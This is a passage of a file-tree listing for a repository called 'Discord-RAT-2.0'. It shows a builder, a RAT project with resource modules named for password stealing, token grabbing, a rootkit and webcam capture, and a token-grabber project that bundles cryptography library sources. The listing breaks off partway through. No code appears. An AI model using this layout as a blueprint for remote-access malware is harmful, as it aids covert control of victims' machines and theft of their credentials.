======================: FILES :======================
Discord-RAT-2.0
├── builder
│   ├── App.config
│   ├── builder.csproj
│   ├── Form1.cs
│   ├── Form1.Designer.cs
│   ├── Form1.resx
│   ├── packages.config
│   ├── Program.cs
│   └── Properties
│       ├── AssemblyInfo.cs
│       ├── Resources.Designer.cs
│       ├── Resources.resx
│       ├── Settings.Designer.cs
│       └── Settings.settings
├── Discord rat
│   ├── App.config
│   ├── Discord rat.csproj
│   ├── Discord rat.sln
│   ├── packages
│   │   └── dnlib.3.5.0
│   │       ├── dnlib.3.5.0.nupkg
│   │       ├── lib
│   │       │   ├── net35
│   │       │   │   ├── dnlib.dll
│   │       │   │   └── dnlib.xml
│   │       │   ├── net45
│   │       │   │   ├── dnlib.dll
│   │       │   │   └── dnlib.xml
│   │       │   └── netstandard2.0
│   │       │       ├── dnlib.dll
│   │       │       └── dnlib.xml
│   │       └── LICENSE.txt
│   ├── Program.cs
│   ├── Properties
│   │   └── AssemblyInfo.cs
│   ├── Resources
│   │   ├── PasswordStealer.dll
│   │   ├── rootkit.dll
│   │   ├── Token grabber.dll
│   │   ├── unrootkit.dll
│   │   └── Webcam.dll
│   └── settings.cs
├── README.md
├── Token grabber
│   ├── grabber.cs
│   ├── Properties
│   │   └── AssemblyInfo.cs
│   ├── src
│   │   ├── asn1
│   │   │   ├── anssi
│   │   │   │   ├── ANSSINamedCurves.cs
│   │   │   │   └── ANSSIObjectIdentifiers.cs
│   │   │   ├── Asn1BitStringParser.cs
│   │   │   ├── Asn1Encodable.cs
│   │   │   ├── Asn1EncodableVector.cs
│   │   │   ├── Asn1Exception.cs
│   │   │   ├── ASN1Generator.cs
│   │   │   ├── Asn1InputStream.cs
│   │   │   ├── Asn1Null.cs
│   │   │   ├── Asn1Object.cs
│   │   │   ├── Asn1ObjectDescriptor.cs
│   │   │   ├── Asn1OctetString.cs
│   │   │   ├── ASN1OctetStringParser.cs
│   │   │   ├── Asn1OutputStream.cs
│   │   │   ├── Asn1ParsingException.cs
│   │   │   ├── Asn1RelativeOid.cs
│   │   │   ├── Asn1Sequence.cs
│   │   │   ├── ASN1SequenceParser.cs
│   │   │   ├── Asn1Set.cs
│   │   │   ├── ASN1SetParser.cs
│   │   │   ├── ASN1StreamParser.cs
│   │   │   ├── Asn1Tag.cs
│   │   │   ├── Asn1TaggedObject.cs
│   │   │   ├── ASN1TaggedObjectParser.cs
│   │   │   ├── Asn1Tags.cs
│   │   │   ├── Asn1Type.cs
│   │   │   ├── Asn1UniversalType.cs
│   │   │   ├── Asn1UniversalTypes.cs
│   │   │   ├── Asn1Utilities.cs
│   │   │   ├── bc
│   │   │   │   ├── BCObjectIdentifiers.cs
│   │   │   │   └── LinkedCertificate.cs
│   │   │   ├── BERBitString.cs
│   │   │   ├── BerBitStringParser.cs
│   │   │   ├── BERGenerator.cs
│   │   │   ├── BerOctetString.cs
│   │   │   ├── BEROctetStringGenerator.cs
│   │   │   ├── BEROctetStringParser.cs
│   │   │   ├── BerSequence.cs
│   │   │   ├── BERSequenceGenerator.cs
│   │   │   ├── BERSequenceParser.cs
│   │   │   ├── BerSet.cs
│   │   │   ├── BERSetGenerator.cs
│   │   │   ├── BERSetParser.cs
│   │   │   ├── BerTaggedObject.cs
│   │   │   ├── BERTaggedObjectParser.cs
│   │   │   ├── bsi
│   │   │   │   └── BsiObjectIdentifiers.cs
│   │   │   ├── cmp
│   │   │   │   ├── CAKeyUpdAnnContent.cs
│   │   │   │   ├── CertConfirmContent.cs
│   │   │   │   ├── CertifiedKeyPair.cs
│   │   │   │   ├── CertOrEncCert.cs
│   │   │   │   ├── CertRepMessage.cs
│   │   │   │   ├── CertResponse.cs
│   │   │   │   ├── CertStatus.cs
│   │   │   │   ├── Challenge.cs
│   │   │   │   ├── CmpCertificate.cs
│   │   │   │   ├── CmpObjectIdentifiers.cs
│   │   │   │   ├── CrlAnnContent.cs
│   │   │   │   ├── ErrorMsgContent.cs
│   │   │   │   ├── GenMsgContent.cs
│   │   │   │   ├── GenRepContent.cs
│   │   │   │   ├── InfoTypeAndValue.cs
│   │   │   │   ├── KeyRecRepContent.cs
│   │   │   │   ├── OobCertHash.cs
│   │   │   │   ├── PbmParameter.cs
│   │   │   │   ├── PKIBody.cs
│   │   │   │   ├── PKIConfirmContent.cs
│   │   │   │   ├── PKIFailureInfo.cs
│   │   │   │   ├── PKIFreeText.cs
│   │   │   │   ├── PKIHeaderBuilder.cs
│   │   │   │   ├── PKIHeader.cs
│   │   │   │   ├── PKIMessage.cs
│   │   │   │   ├── PKIMessages.cs
│   │   │   │   ├── PKIStatus.cs
│   │   │   │   ├── PKIStatusInfo.cs
│   │   │   │   ├── PollRepContent.cs
│   │   │   │   ├── PollReqContent.cs
│   │   │   │   ├── PopoDecKeyChallContent.cs
│   │   │   │   ├── PopoDecKeyRespContent.cs
│   │   │   │   ├── ProtectedPart.cs
│   │   │   │   ├── RevAnnContent.cs
│   │   │   │   ├── RevDetails.cs
│   │   │   │   ├── RevRepContentBuilder.cs
│   │   │   │   ├── RevRepContent.cs
│   │   │   │   └── RevReqContent.cs
│   │   │   ├── cms
│   │   │   │   ├── Attribute.cs
│   │   │   │   ├── Attributes.cs
│   │   │   │   ├── AttributeTable.cs
│   │   │   │   ├── AuthenticatedData.cs
│   │   │   │   ├── AuthenticatedDataParser.cs
│   │   │   │   ├── AuthEnvelopedData.cs
│   │   │   │   ├── AuthEnvelopedDataParser.cs
│   │   │   │   ├── CMSAttributes.cs
│   │   │   │   ├── CMSObjectIdentifiers.cs
│   │   │   │   ├── CompressedData.cs
│   │   │   │   ├── CompressedDataParser.cs
│   │   │   │   ├── ContentInfo.cs
│   │   │   │   ├── ContentInfoParser.cs
│   │   │   │   ├── ecc
│   │   │   │   │   └── MQVuserKeyingMaterial.cs
│   │   │   │   ├── EncryptedContentInfo.cs
│   │   │   │   ├── EncryptedContentInfoParser.cs
│   │   │   │   ├── EncryptedData.cs
│   │   │   │   ├── EnvelopedData.cs
│   │   │   │   ├── EnvelopedDataParser.cs
│   │   │   │   ├── Evidence.cs
│   │   │   │   ├── IssuerAndSerialNumber.cs
│   │   │   │   ├── KEKIdentifier.cs
│   │   │   │   ├── KEKRecipientInfo.cs
│   │   │   │   ├── KeyAgreeRecipientIdentifier.cs
│   │   │   │   ├── KeyAgreeRecipientInfo.cs
│   │   │   │   ├── KeyTransRecipientInfo.cs
│   │   │   │   ├── MetaData.cs
│   │   │   │   ├── OriginatorIdentifierOrKey.cs
│   │   │   │   ├── OriginatorInfo.cs
│   │   │   │   ├── OriginatorPublicKey.cs
│   │   │   │   ├── OtherKeyAttribute.cs
│   │   │   │   ├── OtherRecipientInfo.cs
│   │   │   │   ├── OtherRevocationInfoFormat.cs
│   │   │   │   ├── PasswordRecipientInfo.cs
│   │   │   │   ├── RecipientEncryptedKey.cs
│   │   │   │   ├── RecipientIdentifier.cs
│   │   │   │   ├── RecipientInfo.cs
│   │   │   │   ├── RecipientKeyIdentifier.cs
│   │   │   │   ├── SCVPReqRes.cs
│   │   │   │   ├── SignedData.cs
│   │   │   │   ├── SignedDataParser.cs
│   │   │   │   ├── SignerIdentifier.cs
│   │   │   │   ├── SignerInfo.cs
│   │   │   │   ├── Time.cs
│   │   │   │   ├── TimeStampAndCRL.cs
│   │   │   │   ├── TimeStampedData.cs
│   │   │   │   ├── TimeStampedDataParser.cs
│   │   │   │   └── TimeStampTokenEvidence.cs
│   │   │   ├── ConstructedBitStream.cs
│   │   │   ├── ConstructedDLEncoding.cs
│   │   │   ├── ConstructedILEncoding.cs
│   │   │   ├── ConstructedLazyDLEncoding.cs
│   │   │   ├── ConstructedOctetStream.cs
│   │   │   ├── crmf
│   │   │   │   ├── AttributeTypeAndValue.cs
│   │   │   │   ├── CertId.cs
│   │   │   │   ├── CertReqMessages.cs
│   │   │   │   ├── CertReqMsg.cs
│   │   │   │   ├── CertRequest.cs
│   │   │   │   ├── CertTemplateBuilder.cs
│   │   │   │   ├── CertTemplate.cs
│   │   │   │   ├── Controls.cs
│   │   │   │   ├── CrmfObjectIdentifiers.cs
│   │   │   │   ├── EncKeyWithID.cs
│   │   │   │   ├── EncryptedKey.cs
│   │   │   │   ├── EncryptedValue.cs
│   │   │   │   ├── OptionalValidity.cs
│   │   │   │   ├── PKIArchiveOptions.cs
│   │   │   │   ├── PKIPublicationInfo.cs
│   │   │   │   ├── PKMacValue.cs
│   │   │   │   ├── PopoPrivKey.cs
│   │   │   │   ├── PopoSigningKey.cs
│   │   │   │   ├── PopoSigningKeyInput.cs
│   │   │   │   ├── ProofOfPossession.cs
│   │   │   │   ├── SinglePubInfo.cs
│   │   │   │   └── SubsequentMessage.cs
│   │   │   ├── cryptopro
│   │   │   │   ├── CryptoProObjectIdentifiers.cs
│   │   │   │   ├── ECGOST3410NamedCurves.cs
│   │   │   │   ├── ECGOST3410ParamSetParameters.cs
│   │   │   │   ├── GOST28147Parameters.cs
│   │   │   │   ├── GOST3410NamedParameters.cs
│   │   │   │   ├── GOST3410ParamSetParameters.cs
│   │   │   │   └── GOST3410PublicKeyAlgParameters.cs
│   │   │   ├── DefiniteLengthInputStream.cs
│   │   │   ├── DerBitString.cs
│   │   │   ├── DerBMPString.cs
│   │   │   ├── DerBoolean.cs
│   │   │   ├── DerEnumerated.cs
│   │   │   ├── DERExternal.cs
│   │   │   ├── DERExternalParser.cs
│   │   │   ├── DerGeneralizedTime.cs
│   │   │   ├── DerGeneralString.cs
│   │   │   ├── DERGenerator.cs
│   │   │   ├── DerGraphicString.cs
│   │   │   ├── DerIA5String.cs
│   │   │   ├── DerInteger.cs
│   │   │   ├── DerNull.cs
│   │   │   ├── DerNumericString.cs
│   │   │   ├── DerObjectIdentifier.cs
│   │   │   ├── DerOctetString.cs
│   │   │   ├── DEROctetStringParser.cs
│   │   │   ├── DerOutputStream.cs
│   │   │   ├── DerPrintableString.cs
│   │   │   ├── DerSequence.cs
│   │   │   ├── DERSequenceGenerator.cs
│   │   │   ├── DERSequenceParser.cs
│   │   │   ├── DerSet.cs
│   │   │   ├── DERSetGenerator.cs
│   │   │   ├── DERSetParser.cs
│   │   │   ├── DerStringBase.cs
│   │   │   ├── DerT61String.cs
│   │   │   ├── DerTaggedObject.cs
│   │   │   ├── DerUniversalString.cs
│   │   │   ├── DerUTCTime.cs
│   │   │   ├── DerUTF8String.cs
│   │   │   ├── DerVideotexString.cs
│   │   │   ├── DerVisibleString.cs
│   │   │   ├── DLBitString.cs
│   │   │   ├── DLBitStringParser.cs
│   │   │   ├── DLSequence.cs
│   │   │   ├── DLSet.cs
│   │   │   ├── DLTaggedObject.cs
│   │   │   ├── DLTaggedObjectParser.cs
│   │   │   ├── eac
│   │   │   │   └── EACObjectIdentifiers.cs
│   │   │   ├── edec
│   │   │   │   └── EdECObjectIdentifiers.cs
│   │   │   ├── esf
│   │   │   │   ├── CertificateValues.cs
│   │   │   │   ├── CommitmentTypeIdentifier.cs
│   │   │   │   ├── CommitmentTypeIndication.cs
│   │   │   │   ├── CommitmentTypeQualifier.cs
│   │   │   │   ├── CompleteCertificateRefs.cs
│   │   │   │   ├── CompleteRevocationRefs.cs
│   │   │   │   ├── CrlIdentifier.cs
│   │   │   │   ├── CrlListID.cs
│   │   │   │   ├── CrlOcspRef.cs
│   │   │   │   ├── CrlValidatedID.cs
│   │   │   │   ├── ESFAttributes.cs
│   │   │   │   ├── OcspIdentifier.cs
│   │   │   │   ├── OcspListID.cs
│   │   │   │   ├── OcspResponsesID.cs
│   │   │   │   ├── OtherCertID.cs
│   │   │   │   ├── OtherHashAlgAndValue.cs
│   │   │   │   ├── OtherHash.cs
│   │   │   │   ├── OtherRevRefs.cs
│   │   │   │   ├── OtherRevVals.cs
│   │   │   │   ├── OtherSigningCertificate.cs
│   │   │   │   ├── RevocationValues.cs
│   │   │   │   ├── SignaturePolicyId.cs
│   │   │   │   ├── SignaturePolicyIdentifier.cs
│   │   │   │   ├── SignerAttribute.cs
│   │   │   │   ├── SignerLocation.cs
│   │   │   │   └── SigPolicyQualifierInfo.cs
│   │   │   ├── ess
│   │   │   │   ├── ContentHints.cs
│   │   │   │   ├── ContentIdentifier.cs
│   │   │   │   ├── ESSCertID.cs
│   │   │   │   ├── ESSCertIDv2.cs
│   │   │   │   ├── SigningCertificate.cs
│   │   │   │   └── SigningCertificateV2.cs
│   │   │   ├── gm
│   │   │   │   ├── GMNamedCurves.cs
│   │   │   │   └── GMObjectIdentifiers.cs
│   │   │   ├── gnu
│   │   │   │   └── GNUObjectIdentifiers.cs
│   │   │   ├── iana
│   │   │   │   └── IANAObjectIdentifiers.cs
│   │   │   ├── IAsn1Choice.cs
│   │   │   ├── IAsn1Convertible.cs
│   │   │   ├── IAsn1Encoding.cs
│   │   │   ├── IAsn1String.cs
│   │   │   ├── icao
│   │   │   │   ├── CscaMasterList.cs
│   │   │   │   ├── DataGroupHash.cs
│   │   │   │   ├── ICAOObjectIdentifiers.cs
│   │   │   │   ├── LDSSecurityObject.cs
│   │   │   │   └── LDSVersionInfo.cs
│   │   │   ├── IndefiniteLengthInputStream.cs
│   │   │   ├── isismtt
│   │   │   │   ├── ISISMTTObjectIdentifiers.cs
│   │   │   │   ├── ocsp
│   │   │   │   │   ├── CertHash.cs
│   │   │   │   │   └── RequestedCertificate.cs
│   │   │   │   └── x509
│   │   │   │       ├── AdditionalInformationSyntax.cs
│   │   │   │       ├── Admissions.cs
│   │   │   │       ├── AdmissionSyntax.cs
│   │   │   │       ├── DeclarationOfMajority.cs
│   │   │   │       ├── MonetaryLimit.cs
│   │   │   │       ├── NamingAuthority.cs
│   │   │   │       ├── ProcurationSyntax.cs
│   │   │   │       ├── ProfessionInfo.cs
│   │   │   │       └── Restriction.cs
│   │   │   ├── kisa
│   │   │   │   └── KISAObjectIdentifiers.cs
│   │   │   ├── LazyASN1InputStream.cs
│   │   │   ├── LazyDLEnumerator.cs
│   │   │   ├── LazyDLSequence.cs
│   │   │   ├── LazyDLSet.cs
│   │   │   ├── LimitedInputStream.cs
│   │   │   ├── microsoft
│   │   │   │   └── MicrosoftObjectIdentifiers.cs
│   │   │   ├── misc
│   │   │   │   ├── CAST5CBCParameters.cs
│   │   │   │   ├── IDEACBCPar.cs
│   │   │   │   ├── MiscObjectIdentifiers.cs
│   │   │   │   ├── NetscapeCertType.cs
│   │   │   │   ├── NetscapeRevocationURL.cs
│   │   │   │   └── VerisignCzagExtension.cs
│   │   │   ├── mozilla
│   │   │   │   └── PublicKeyAndChallenge.cs
│   │   │   ├── nist
│   │   │   │   ├── KMACwithSHAKE128_params.cs
│   │   │   │   ├── KMACwithSHAKE256_params.cs
│   │   │   │   ├── NISTNamedCurves.cs
│   │   │   │   └── NISTObjectIdentifiers.cs
│   │   │   ├── nsri
│   │   │   │   └── NsriObjectIdentifiers.cs
│   │   │   ├── ntt
│   │   │   │   └── NTTObjectIdentifiers.cs
│   │   │   ├── ocsp
│   │   │   │   ├── BasicOCSPResponse.cs
│   │   │   │   ├── CertID.cs
│   │   │   │   ├── CertStatus.cs
│   │   │   │   ├── CrlID.cs
│   │   │   │   ├── OCSPObjectIdentifiers.cs
│   │   │   │   ├── OCSPRequest.cs
│   │   │   │   ├── OCSPResponse.cs
│   │   │   │   ├── OCSPResponseStatus.cs
│   │   │   │   ├── Request.cs
│   │   │   │   ├── ResponderID.cs
│   │   │   │   ├── ResponseBytes.cs
│   │   │   │   ├── ResponseData.cs
│   │   │   │   ├── RevokedInfo.cs
│   │   │   │   ├── ServiceLocator.cs
│   │   │   │   ├── Signature.cs
│   │   │   │   ├── SingleResponse.cs
│   │   │   │   └── TBSRequest.cs
│   │   │   ├── OidTokenizer.cs
│   │   │   ├── oiw
│   │   │   │   ├── ElGamalParameter.cs
│   │   │   │   └── OIWObjectIdentifiers.cs
│   │   │   ├── pkcs
│   │   │   │   ├── Attribute.cs
│   │   │   │   ├── AuthenticatedSafe.cs
│   │   │   │   ├── CertBag.cs
│   │   │   │   ├── CertificationRequest.cs
│   │   │   │   ├── CertificationRequestInfo.cs
│   │   │   │   ├── ContentInfo.cs
│   │   │   │   ├── DHParameter.cs
│   │   │   │   ├── EncryptedData.cs
│   │   │   │   ├── EncryptedPrivateKeyInfo.cs
│   │   │   │   ├── EncryptionScheme.cs
│   │   │   │   ├── IssuerAndSerialNumber.cs
│   │   │   │   ├── KeyDerivationFunc.cs
│   │   │   │   ├── MacData.cs
│   │   │   │   ├── PBEParameter.cs
│   │   │   │   ├── PBES2Parameters.cs
│   │   │   │   ├── PBKDF2Params.cs
│   │   │   │   ├── Pfx.cs
│   │   │   │   ├── PKCS12PBEParams.cs
│   │   │   │   ├── PKCSObjectIdentifiers.cs
│   │   │   │   ├── PrivateKeyInfo.cs
│   │   │   │   ├── RC2CBCParameter.cs
│   │   │   │   ├── RSAESOAEPparams.cs
│   │   │   │   ├── RSAPrivateKeyStructure.cs
│   │   │   │   ├── RSASSAPSSparams.cs
│   │   │   │   ├── SafeBag.cs
│   │   │   │   ├── SignedData.cs
│   │   │   │   └── SignerInfo.cs
│   │   │   ├── PrimitiveEncoding.cs
│   │   │   ├── PrimitiveEncodingSuffixed.cs
│   │   │   ├── rosstandart
│   │   │   │   └── RosstandartObjectIdentifiers.cs
│   │   │   ├── sec
│   │   │   │   ├── ECPrivateKeyStructure.cs
│   │   │   │   ├── SECNamedCurves.cs
│   │   │   │   └── SECObjectIdentifiers.cs
│   │   │   ├── smime
│   │   │   │   ├── SMIMEAttributes.cs
│   │   │   │   ├── SMIMECapabilitiesAttribute.cs
│   │   │   │   ├── SMIMECapabilities.cs
│   │   │   │   ├── SMIMECapability.cs
│   │   │   │   ├── SMIMECapabilityVector.cs
│   │   │   │   └── SMIMEEncryptionKeyPreferenceAttribute.cs
│   │   │   ├── teletrust
│   │   │   │   ├── TeleTrusTNamedCurves.cs
│   │   │   │   └── TeleTrusTObjectIdentifiers.cs
│   │   │   ├── tsp
│   │   │   │   ├── Accuracy.cs
│   │   │   │   ├── MessageImprint.cs
│   │   │   │   ├── TimeStampReq.cs
│   │   │   │   ├── TimeStampResp.cs
│   │   │   │   └── TSTInfo.cs
│   │   │   ├── ua
│   │   │   │   └── UAObjectIdentifiers.cs
│   │   │   ├── util
│   │   │   │   └── Asn1Dump.cs
│   │   │   ├── x500
│   │   │   │   ├── AttributeTypeAndValue.cs
│   │   │   │   ├── DirectoryString.cs
│   │   │   │   ├── Rdn.cs
│   │   │   │   └── style
│   │   │   │       └── IetfUtilities.cs
│   │   │   ├── x509
│   │   │   │   ├── AccessDescription.cs
│   │   │   │   ├── AlgorithmIdentifier.cs
│   │   │   │   ├── AttCertIssuer.cs
│   │   │   │   ├── AttCertValidityPeriod.cs
│   │   │   │   ├── AttributeCertificate.cs
│   │   │   │   ├── AttributeCertificateInfo.cs
│   │   │   │   ├── Attribute.cs
│   │   │   │   ├── AttributeTable.cs
│   │   │   │   ├── AuthorityInformationAccess.cs
│   │   │   │   ├── AuthorityKeyIdentifier.cs
│   │   │   │   ├── BasicConstraints.cs
│   │   │   │   ├── CertificateList.cs
│   │   │   │   ├── CertificatePair.cs
│   │   │   │   ├── CertificatePolicies.cs
│   │   │   │   ├── CertPolicyId.cs
│   │   │   │   ├── CRLDistPoint.cs
│   │   │   │   ├── CRLNumber.cs
│   │   │   │   ├── CRLReason.cs
│   │   │   │   ├── DigestInfo.cs
│   │   │   │   ├── DisplayText.cs
│   │   │   │   ├── DistributionPoint.cs
│   │   │   │   ├── DistributionPointName.cs
│   │   │   │   ├── DSAParameter.cs
│   │   │   │   ├── ExtendedKeyUsage.cs
│   │   │   │   ├── GeneralName.cs
│   │   │   │   ├── GeneralNames.cs
│   │   │   │   ├── GeneralSubtree.cs
│   │   │   │   ├── Holder.cs
│   │   │   │   ├── IetfAttrSyntax.cs
│   │   │   │   ├── IssuerSerial.cs
│   │   │   │   ├── IssuingDistributionPoint.cs
│   │   │   │   ├── KeyPurposeId.cs
│   │   │   │   ├── KeyUsage.cs
│   │   │   │   ├── NameConstraints.cs
│   │   │   │   ├── NoticeReference.cs
│   │   │   │   ├── ObjectDigestInfo.cs
│   │   │   │   ├── OtherName.cs
│   │   │   │   ├── PolicyInformation.cs
│   │   │   │   ├── PolicyMappings.cs
│   │   │   │   ├── PolicyQualifierId.cs
│   │   │   │   ├── PolicyQualifierInfo.cs
│   │   │   │   ├── PrivateKeyUsagePeriod.cs
│   │   │   │   ├── qualified
│   │   │   │   │   ├── BiometricData.cs
│   │   │   │   │   ├── ETSIQCObjectIdentifiers.cs
│   │   │   │   │   ├── Iso4217CurrencyCode.cs
│   │   │   │   │   ├── MonetaryValue.cs
│   │   │   │   │   ├── QCStatement.cs
│   │   │   │   │   ├── RFC3739QCObjectIdentifiers.cs
│   │   │   │   │   ├── SemanticsInformation.cs
│   │   │   │   │   └── TypeOfBiometricData.cs
│   │   │   │   ├── ReasonFlags.cs
│   │   │   │   ├── RoleSyntax.cs
│   │   │   │   ├── RSAPublicKeyStructure.cs
│   │   │   │   ├── sigi
│   │   │   │   │   ├── NameOrPseudonym.cs
│   │   │   │   │   ├── PersonalData.cs
│   │   │   │   │   └── SigIObjectIdentifiers.cs
│   │   │   │   ├── SubjectDirectoryAttributes.cs
│   │   │   │   ├── SubjectKeyIdentifier.cs
│   │   │   │   ├── SubjectPublicKeyInfo.cs
│   │   │   │   ├── Target.cs
│   │   │   │   ├── TargetInformation.cs
│   │   │   │   ├── Targets.cs
│   │   │   │   ├── TBSCertificateStructure.cs
│   │   │   │   ├── TBSCertList.cs
│   │   │   │   ├── Time.cs
│   │   │   │   ├── UserNotice.cs
│   │   │   │   ├── V1TBSCertificateGenerator.cs
│   │   │   │   ├── V2AttributeCertificateInfoGenerator.cs
│   │   │   │   ├── V2Form.cs
│   │   │   │   ├── V2TBSCertListGenerator.cs
│   │   │   │   ├── V3TBSCertificateGenerator.cs
│   │   │   │   ├── X509Attributes.cs
│   │   │   │   ├── X509CertificateStructure.cs
│   │   │   │   ├── X509DefaultEntryConverter.cs
│   │   │   │   ├── X509Extension.cs
│   │   │   │   ├── X509Extensions.cs
│   │   │   │   ├── X509ExtensionsGenerator.cs
│   │   │   │   ├── X509Name.cs
│   │   │   │   ├── X509NameEntryConverter.cs
│   │   │   │   ├── X509NameTokenizer.cs
│   │   │   │   └── X509ObjectIdentifiers.cs
│   │   │   └── x9
│   │   │       ├── DHDomainParameters.cs
│   │   │       ├── DHPublicKey.cs
│   │   │       ├── DHValidationParms.cs
│   │   │       ├── ECNamedCurveTable.cs
│   │   │       ├── KeySpecificInfo.cs
│   │   │       ├── OtherInfo.cs
│   │   │       ├── X962NamedCurves.cs
│   │   │       ├── X962Parameters.cs
│   │   │       ├── X9Curve.cs
│   │   │       ├── X9ECParameters.cs
│   │   │       ├── X9ECParametersHolder.cs
│   │   │       ├── X9ECPoint.cs
│   │   │       ├── X9FieldElement.cs
│   │   │       ├── X9FieldID.cs
│   │   │       ├── X9IntegerConverter.cs
│   │   │       └── X9ObjectIdentifiers.cs
│   │   ├── AssemblyInfo.cs
│   │   ├── bcpg
│   │   │   ├── ArmoredInputStream.cs
│   │   │   ├── ArmoredOutputStream.cs
│   │   │   ├── attr
│   │   │   │   └── ImageAttrib.cs
│   │   │   ├── BcpgInputStream.cs
│   │   │   ├── BcpgObject.cs
│   │   │   ├── BcpgOutputStream.cs
│   │   │   ├── CompressedDataPacket.cs
│   │   │   ├── CompressionAlgorithmTags.cs
│   │   │   ├── ContainedPacket.cs
│   │   │   ├── Crc24.cs
│   │   │   ├── DsaPublicBcpgKey.cs
│   │   │   ├── DsaSecretBcpgKey.cs
│   │   │   ├── ECDHPublicBCPGKey.cs
│   │   │   ├── ECDsaPublicBCPGKey.cs
│   │   │   ├── ECPublicBCPGKey.cs
│   │   │   ├── ECSecretBCPGKey.cs
│   │   │   ├── ElGamalPublicBcpgKey.cs
│   │   │   ├── ElGamalSecretBcpgKey.cs
│   │   │   ├── ExperimentalPacket.cs
│   │   │   ├── HashAlgorithmTags.cs
│   │   │   ├── IBcpgKey.cs
│   │   │   ├── InputStreamPacket.cs
│   │   │   ├── LiteralDataPacket.cs
│   │   │   ├── MarkerPacket.cs
│   │   │   ├── ModDetectionCodePacket.cs
│   │   │   ├── MPInteger.cs
│   │   │   ├── OnePassSignaturePacket.cs
│   │   │   ├── OutputStreamPacket.cs
│   │   │   ├── Packet.cs
│   │   │   ├── PacketTags.cs
│   │   │   ├── PublicKeyAlgorithmTags.cs
│   │   │   ├── PublicKeyEncSessionPacket.cs
│   │   │   ├── PublicKeyPacket.cs
│   │   │   ├── PublicSubkeyPacket.cs
│   │   │   ├── RsaPublicBcpgKey.cs
│   │   │   ├── RsaSecretBcpgKey.cs
│   │   │   ├── S2k.cs
│   │   │   ├── SecretKeyPacket.cs
│   │   │   ├── SecretSubkeyPacket.cs
│   │   │   ├── sig
│   │   │   │   ├── EmbeddedSignature.cs
│   │   │   │   ├── Exportable.cs
│   │   │   │   ├── Features.cs
│   │   │   │   ├── IssuerKeyId.cs
│   │   │   │   ├── KeyExpirationTime.cs
│   │   │   │   ├── KeyFlags.cs
│   │   │   │   ├── NotationData.cs
│   │   │   │   ├── PreferredAlgorithms.cs
│   │   │   │   ├── PrimaryUserId.cs
│   │   │   │   ├── Revocable.cs
│   │   │   │   ├── RevocationKey.cs
│   │   │   │   ├── RevocationKeyTags.cs
│   │   │   │   ├── RevocationReason.cs
│   │   │   │   ├── RevocationReasonTags.cs
│   │   │   │   ├── SignatureCreationTime.cs
│   │   │   │   ├── SignatureExpirationTime.cs
│   │   │   │   ├── SignerUserId.cs
│   │   │   │   └── TrustSignature.cs
│   │   │   ├── SignaturePacket.cs
│   │   │   ├── SignatureSubpacket.cs
│   │   │   ├── SignatureSubpacketsReader.cs
│   │   │   ├── SignatureSubpacketTags.cs
│   │   │   ├── SymmetricEncDataPacket.cs
│   │   │   ├── SymmetricEncIntegrityPacket.cs
│   │   │   ├── SymmetricKeyAlgorithmTags.cs
│   │   │   ├── SymmetricKeyEncSessionPacket.cs
│   │   │   ├── TrustPacket.cs
│   │   │   ├── UnsupportedPacketVersionException.cs
│   │   │   ├── UserAttributePacket.cs
│   │   │   ├── UserAttributeSubpacket.cs
│   │   │   ├── UserAttributeSubpacketsReader.cs
│   │   │   ├── UserAttributeSubpacketTags.cs
│   │   │   └── UserIdPacket.cs
│   │   ├── BouncyCastle.Crypto.csproj
│   │   ├── bzip2
│   │   │   ├── BZip2Constants.cs
│   │   │   ├── CBZip2InputStream.cs
│   │   │   ├── CBZip2OutputStream.cs
│   │   │   └── CRC.cs
│   │   ├── cmp
│   │   │   ├── CertificateConfirmationContentBuilder.cs
│   │   │   ├── CertificateConfirmationContent.cs
│   │   │   ├── CertificateStatus.cs
│   │   │   ├── CmpException.cs
│   │   │   ├── GeneralPkiMessage.cs
│   │   │   ├── ProtectedPkiMessageBuilder.cs
│   │   │   ├── ProtectedPkiMessage.cs
│   │   │   ├── RevocationDetailsBuilder.cs
│   │   │   └── RevocationDetails.cs
│   │   ├── cms
│   │   │   ├── BaseDigestCalculator.cs
│   │   │   ├── CMSAttributeTableGenerationException.cs
│   │   │   ├── CMSAttributeTableGenerator.cs
│   │   │   ├── CMSAuthenticatedData.cs
│   │   │   ├── CMSAuthenticatedDataGenerator.cs
│   │   │   ├── CMSAuthenticatedDataParser.cs
│   │   │   ├── CMSAuthenticatedDataStreamGenerator.cs
│   │   │   ├── CMSAuthenticatedGenerator.cs
│   │   │   ├── CMSAuthEnvelopedData.cs
│   │   │   ├── CMSAuthEnvelopedGenerator.cs
│   │   │   ├── CMSCompressedData.cs
│   │   │   ├── CMSCompressedDataGenerator.cs
│   │   │   ├── CMSCompressedDataParser.cs
│   │   │   ├── CMSCompressedDataStreamGenerator.cs
│   │   │   ├── CMSContentInfoParser.cs
│   │   │   ├── CMSEnvelopedData.cs
│   │   │   ├── CMSEnvelopedDataGenerator.cs
│   │   │   ├── CMSEnvelopedDataParser.cs
│   │   │   ├── CMSEnvelopedDataStreamGenerator.cs
│   │   │   ├── CMSEnvelopedGenerator.cs
│   │   │   ├── CMSEnvelopedHelper.cs
│   │   │   ├── CMSException.cs
│   │   │   ├── CMSPBEKey.cs
│   │   │   ├── CMSProcessableByteArray.cs
│   │   │   ├── CMSProcessable.cs
│   │   │   ├── CMSProcessableFile.cs
│   │   │   ├── CMSProcessableInputStream.cs
│   │   │   ├── CMSReadable.cs
│   │   │   ├── CMSSecureReadable.cs
│   │   │   ├── CMSSignedData.cs
│   │   │   ├── CMSSignedDataGenerator.cs
│   │   │   ├── CMSSignedDataParser.cs
│   │   │   ├── CMSSignedDataStreamGenerator.cs
│   │   │   ├── CMSSignedGenerator.cs
│   │   │   ├── CMSSignedHelper.cs
│   │   │   ├── CMSStreamException.cs
│   │   │   ├── CMSTypedStream.cs
│   │   │   ├── CMSUtils.cs
│   │   │   ├── CounterSignatureDigestCalculator.cs
│   │   │   ├── DefaultAuthenticatedAttributeTableGenerator.cs
│   │   │   ├── DefaultSignedAttributeTableGenerator.cs
│   │   │   ├── EnvelopedDataHelper.cs
│   │   │   ├── IDigestCalculator.cs
│   │   │   ├── KEKRecipientInfoGenerator.cs
│   │   │   ├── KEKRecipientInformation.cs
│   │   │   ├── KeyAgreeRecipientInfoGenerator.cs
│   │   │   ├── KeyAgreeRecipientInformation.cs
│   │   │   ├── KeyTransRecipientInfoGenerator.cs
│   │   │   ├── KeyTransRecipientInformation.cs
│   │   │   ├── OriginatorId.cs
│   │   │   ├── OriginatorInfoGenerator.cs
│   │   │   ├── OriginatorInformation.cs
│   │   │   ├── PasswordRecipientInfoGenerator.cs
│   │   │   ├── PasswordRecipientInformation.cs
